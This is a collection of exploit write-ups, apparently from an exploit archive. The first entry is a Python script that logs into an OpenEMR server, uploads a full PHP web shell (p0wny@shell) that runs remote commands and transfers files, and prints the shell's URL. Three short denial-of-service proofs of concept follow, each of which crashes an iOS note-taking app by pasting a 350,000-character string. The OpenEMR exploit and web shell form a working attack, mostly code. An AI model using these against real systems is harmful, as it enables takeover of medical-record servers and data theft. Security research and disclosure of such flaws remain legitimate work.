'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Referer': auth_chek_url,
'Upgrade-Insecure-Requests': '1',
}
# Body (auth):
body = {
'new_login_session_management': '1',
'authProvider': 'Default',
'authUser': username,
'clearPass': password,
'languageChoice': '1'
}
# Authentication:
print('')
print('[+] Authentication')
auth = session.post(auth_url,headers=header, data=body)
'''
Exploit:
'''
print('')
print('[+] Uploading Webshell:')
# URL:
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'
# Headers (Exploit):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339",
"Origin": "http://" + target_ip,
"Connection": "close",
"Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',
"Upgrade-Insecure-Requests": "1"
}
# Body (Exploit):
body = "-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n"
# Send Exploit:
session.post(exploit_url, headers=header, data=body)
# Finish
path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'
print('[+] Webshell: ' + path)
# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
# Version: 6.4
# Category: DoS (iOS)
##### Vulnerability #####
Notex – the best notes is vulnerable to a DoS condition when a long list of
characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
# Version: 3.0.3
# Category: DoS (iOS)
##### Vulnerability #####
Secure Notepad - Private Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/post-it/id920127738
# Version: 5.0.1
# Category: DoS (iOS)
##### Vulnerability #####
Post-it is vulnerable to a DoS condition when a long list of characters is
being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new
payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")